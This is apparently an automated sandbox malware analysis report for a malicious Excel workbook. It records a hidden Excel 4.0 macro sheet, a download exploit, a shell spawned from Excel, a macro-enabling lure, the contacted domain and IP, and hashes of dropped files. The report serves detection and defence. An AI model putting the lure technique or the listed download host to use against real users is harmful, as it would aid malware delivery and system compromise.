Analysis Report document-47-2637.xls
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Dropped File: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | Console Write: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | Metadefender: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Code function: | 5_2_003A4F1C |
Source: | File created: | Jump to dropped file |
Source: | Code function: | 5_2_003A230E |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Stream path 'Workbook' entropy: |
Source: | Code function: | 5_2_003A4BBA | |
Source: | Code function: | 5_2_003A4F4C |
Source: | Code function: | 5_2_003A4DF8 |
Source: | Code function: | 5_2_003A47E2 |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Command and Scripting Interpreter1 | Application Shimming1 | Process Injection1 | Masquerading1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting2 | Boot or Logon Initialization Scripts | Application Shimming1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution23 | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting2 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information11 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
26% | Virustotal | Browse | ||
23% | Metadefender | Browse | ||
15% | ReversingLabs | Document-Office.Trojan.Heuristic |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
2% | Metadefender | Browse | ||
0% | ReversingLabs |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
webhub365.com | 198.244.146.96 | true | false |
| unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
198.244.146.96 | webhub365.com | United States | 18630 | RIDLEYSD-NETUS | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 432941 |
Start date: | 11.06.2021 |
Start time: | 00:00:08 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | document-47-2637.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLS@5/14@1/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: | Failed |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
198.244.146.96 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
webhub365.com | Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RIDLEYSD-NETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 60080 |
Entropy (8bit): | 7.995256720209506 |
Encrypted: | true |
SSDEEP: | 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4 |
MD5: | 6045BACCF49E1EBA0E674945311A06E6 |
SHA1: | 379C6234849EECEDE26FAD192C2EE59E0F0221CB |
SHA-256: | 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58 |
SHA-512: | DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.1225789902305854 |
Encrypted: | false |
SSDEEP: | 6:kKLgNie8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:D78kPlE99SNxAhUe3OMx |
MD5: | 9332649BE2B7EEB84D2A51B4FCB8C610 |
SHA1: | EC5B37F58C8810F61A0978167001D6CAEE4CF14D |
SHA-256: | B818B209B0885F643CECD70C1447B3D3C4547F7C7D2884195D19E2AFFC81A42D |
SHA-512: | EB42861F3768F3B86281BBDB86702AA552E46F6CD4B38C215545ADFF820B905ED61B45B40C49B8B97EBF65462F796DA4EE5707F3B241CD24F9033858DA8AA2BE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0169823334697616 |
Encrypted: | false |
SSDEEP: | 3:kkFkluAVfllXlE/JADkdllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yWJ/fdl/:kKWYADk5liBAIdQZV7QWB |
MD5: | 5604964BDBEBD78FC30DCCFE0D288FBC |
SHA1: | CFB823EC2DC190DB7B1B6273EA727DBE29968A9D |
SHA-256: | B7C960629B8D092922FC3F8FAEEC71203CA8F0576026D3167745439AA3108D72 |
SHA-512: | 1499517A5F36BBFE8FE8D4460FCD94564DD6DD53610207A9B715F81BDC504CE306E65246668BABAEC6C3694D300CFBBB4DFAEE48E21E43EE8194083EE2A0F5E8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 60080 |
Entropy (8bit): | 7.995256720209506 |
Encrypted: | true |
SSDEEP: | 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4 |
MD5: | 6045BACCF49E1EBA0E674945311A06E6 |
SHA1: | 379C6234849EECEDE26FAD192C2EE59E0F0221CB |
SHA-256: | 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58 |
SHA-512: | DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 68561 |
Entropy (8bit): | 7.608770850697448 |
Encrypted: | false |
SSDEEP: | 1536:m+yXkNLPHqvAk/Vi6+YDT7Hbc8hxCCV25Z:m+yUNLP4lA6+YHcId25Z |
MD5: | B67C936515D2A419269AB8E2D93204DE |
SHA1: | 44331DB15B55BAD0D97DEFE091ACF39EE39248A3 |
SHA-256: | E933C429EFC848987756125BFE9C3AB422F5E2EFCAEF5F945718AC31F90C9658 |
SHA-512: | 6B3D48B0153F8AC2D2AC7A4FB9462E145321D13AFD8C9284A94837DC5108FD55998CA902B7FD8EC83A8549F5A0B3B8CA4C7B951818AE04B03CF578BC3F5DA210 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 156885 |
Entropy (8bit): | 6.30972017530066 |
Encrypted: | false |
SSDEEP: | 1536:NlR6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMuGmO:N2UJcCyZfdmoku2SL3kMnBGuzO |
MD5: | 9BE376D85B319264740EF583F548B72A |
SHA1: | 6C6416CBC51AAC89A21A529695A8FCD3AD5E6B85 |
SHA-256: | 07FDF8BC502E6BB4CF6AE214694F45C54A53228FC2002B2F17C9A2EF64EB76F6 |
SHA-512: | 8AFC5D0D046E8B410EC1D29E2E16FB00CD92F8822D678AA0EE2A57098E05F2A0E165858347F035AE593B62BF195802CB6F9A5F92670041E1828669987CEEC7DE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.480521840960962 |
Encrypted: | false |
SSDEEP: | 12:85Q8LoLgXg/XAlCPCHaXtB8XzB/04uX+Wnicvb63+bDtZ3YilMMEpxRljKtTdJP8:85I/XTd6jJuYe4SDv3qArNru/ |
MD5: | D1901B672D68B95B87925635D8835BDF |
SHA1: | 3B0CAF79347B90E7F276CB084D1074E24599E8A2 |
SHA-256: | DB6552B4D3F6608CE90336C480BEC6C4E963B8815E377D16E895B186F040AA34 |
SHA-512: | 83D9FFBF227CCBF7539E2DBFD061F446FD7107CDB06FF3967499214442C0EF4E1B23E50B481E85991ECFE0E794C73A8A4CF6DD71359C7B75BAEF747455BA0331 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2088 |
Entropy (8bit): | 4.536758685214297 |
Encrypted: | false |
SSDEEP: | 24:8i/XTd6jFyq4Me431Dv3qAdM7dD2i/XTd6jFyq4Me431Dv3qAdM7dV:8i/XT0jFB4MdEAQh2i/XT0jFB4MdEAQ/ |
MD5: | 709594534DD8AAF9078F756A8817A71A |
SHA1: | 1FAF88E21AE6ED12EAE26EB687EEC62C97B6D7F2 |
SHA-256: | C411BE565BE4A1C8D52CB9FD1510C1CC565F34BCAE4385966579D84C325C74D1 |
SHA-512: | DF93EE96B3EC505691231141EBEF51DB12E8DB0CBC416584E27A8A4C4D9F31E181CC095F27FD21DB1CF709B0C8350CDB0867F3E9308DD3359890EF03010C8CB1 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 101 |
Entropy (8bit): | 4.781102818999889 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMY9LRkKSd6YCZELRkKSd6YCmMY9LRkKSd6YCv:dj6Y9LaJdzgELaJdzUY9LaJdzs |
MD5: | CC574425794FB97F59C2DC249939493A |
SHA1: | 8CA2DFD4C2535E0FFEB160319D2CD079758B7F8D |
SHA-256: | 1D977854F9C0DDF7462B6991CA2B6026C4FFCAF52F158A2C7B81B8FBEE5E35F0 |
SHA-512: | 6C9C7CAFA742354DB174653D4C1CF9521AC10C67177FB2E26A85AE1267F1A45094BD1F1AE3C0B53836D5210F6083906F17C26A28A197D0CCF2F76D7447272E43 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 99 |
Entropy (8bit): | 4.738309873166655 |
Encrypted: | false |
SSDEEP: | 3:12mZI6A3xQlGTKvUQ2NwS2TdeX3Rsa/n:8YIr3xUGZXN2TwXzn |
MD5: | 1013A2F28CACF36A2234BC56C8B76B40 |
SHA1: | 25B9130C97E0351F0707D53C72E4E1C700C324BE |
SHA-256: | 4B034D46F013E42559260BD248B7B0011EE83AE4D836D14FB4083A3BE287C3D2 |
SHA-512: | F28E38E260D8F9B5ADC14C6F449299D6318268412C2BDC9616E46CD9C22AF6DD5546F4684F549EF2FA8B1AD00400370AD2C84BD9ED4DC6704427B7D4EC7ADE73 |
Malicious: | false |
IE Cache URL: | webhub365.com/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 99731 |
Entropy (8bit): | 7.932017898229176 |
Encrypted: | false |
SSDEEP: | 3072:VKZ1QaE1iFKbbG46fQWnPdkuiZpKZ1SaE1/:VKZW9ocW46fjF8ZpKZ49l |
MD5: | 1C3608A1D6C608CAAB12624DE264B8DC |
SHA1: | A83808D92C7633E5123DA9A49FA5F01F9836A256 |
SHA-256: | 9ACD9A818075B4FA763A7B0328DB449DA693309C6EBE330B8C81F14BE566CD91 |
SHA-512: | 4A407DA6AA2A6896391D8C967E18A516B01046D96E7A167A7EDBE4A0FBBCBC73407A72B82137452674142CDE33802B46E1081C0C5C769306736E8A9AAAADE46F |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 117436 |
Entropy (8bit): | 7.9268262065554325 |
Encrypted: | false |
SSDEEP: | 3072:M2hpEu0A4iQEmRqwJOu3J5Pn/cOGWJPn/cZGW02hpEA0w:V0tA4idvu3JRFBoN0/w |
MD5: | 388CD90E27FA7C09A02E5490E32F9408 |
SHA1: | 0E61310B0D55D8C1E24DCBBC9CAA79874959E308 |
SHA-256: | EDA8CD37F5999158DCABBD39B4292FE7692163FBCEEB68AE1BDE1166D350564B |
SHA-512: | 6DA5A552A3ED2229C478AAE92AAAF5436B8F6D9C2DABFD580389DA3243B486C4B7EED5748C753D57123EF474455A77EA64373AC94EE2AEE24B5D872A6268BFAC |
Malicious: | false |
Preview: |
|
Process: | C:\Windows\System32\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 25600 |
Entropy (8bit): | 5.584698658834256 |
Encrypted: | false |
SSDEEP: | 384:zKIhxI3PKZ/COyNcx5GTyoNr9MUVO9FvB3RH++x5XrIQP8S8cB5vWMiG:zKIhxI3PKZ/bIaqyCrXV+v1NrnLB5X |
MD5: | 7F7F391491C315A4A72EFCAC0D34FA93 |
SHA1: | 20A18C7EA14F4E1D3044091B46D6E862B6F38708 |
SHA-256: | 022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52 |
SHA-512: | 78D39D7FD02D4F6CA0E13D0EACADC842D5A104C31342202875F84A69C310ECF6D4DCC8F00E95B09DE936922BE0312CF956C5E955254A99113EFB3F51E26C082E |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.59086745125602 |
TrID: |
|
File name: | document-47-2637.xls |
File size: | 92165 |
MD5: | 92dcc47a1a044fc3a2328ec6eef3918b |
SHA1: | 6f9266a6c0b702cbaa0a3583df5c8cd1357eae35 |
SHA256: | ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988 |
SHA512: | fcd4b7c0a4e0f785604f40e0a9a4690e9b642223ee63088c6c4acfc262a18f5a79c77ab82498b422b229eaecc9a2e745b7e455c43ad2a85794e7adbac6b9bafd |
SSDEEP: | 1536:Lc2ZSmXWCQnp2c90Hg+j8z3kVfKIDVzoFGUslIB54N+wl8MYBzaVt4J5aukGqu:LXZxXTQ8hHgNQNeF3V4NvuhBzaV+J5a+ |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "document-47-2637.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Code Page: | 1252 |
Author: | |
Last Saved By: | |
Create Time: | 2021-06-02 13:40:34 |
Last Saved Time: | 2021-06-02 13:40:36 |
Creating Application: | |
Security: | 1 |
Document Summary | |
---|---|
Document Code Page: | 1252 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.308022095077 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . i . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a5 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.316312415339 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . W i n d o w s U s e r . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . W . . @ . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 10 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81910 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 81910 |
Entropy: | 7.97723236264 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . j . . . _ . W > N . B . . [ . . . . . . D . G . . . . 9 s < D l . o . b . 3 . ^ K W . ~ . U . . . . . . . . . . . h . . . . . \\ . p . i . . v . / . . . . B . 7 r . n . S . $ . 4 f . 7 . U . . e . Y k . . . L Q . . o N . . . . $ a . 7 Q . . . u . s . X U . ^ . . . . . . K . C d . . . l . ? . & . C . . . . . . . . v . . . . . 4 ; / . . . . 6 4 = . . . . . . B . . . . I a . . . . D . . . . = . . . . # . c . . . . h . . . . . s R . . . . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 02 6a df 82 8f 5f f7 57 3e 4e 18 42 a0 92 5b 1d e8 95 bd ea b2 44 89 47 13 ad c8 06 39 73 3c 44 6c 0c 6f cd 62 dc 33 7f 5e 4b 57 2e 7e e6 55 cf e1 00 02 00 b0 04 c1 00 02 00 68 a6 e2 00 00 00 5c 00 70 00 69 b6 c9 76 af 2f 14 b1 ed d6 42 f4 37 72 10 6e cc 53 fc 24 ef 34 66 18 37 82 55 80 f5 65 |
Macro 4.0 Code |
---|
,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,!,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,x,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,mxUXwaSU= 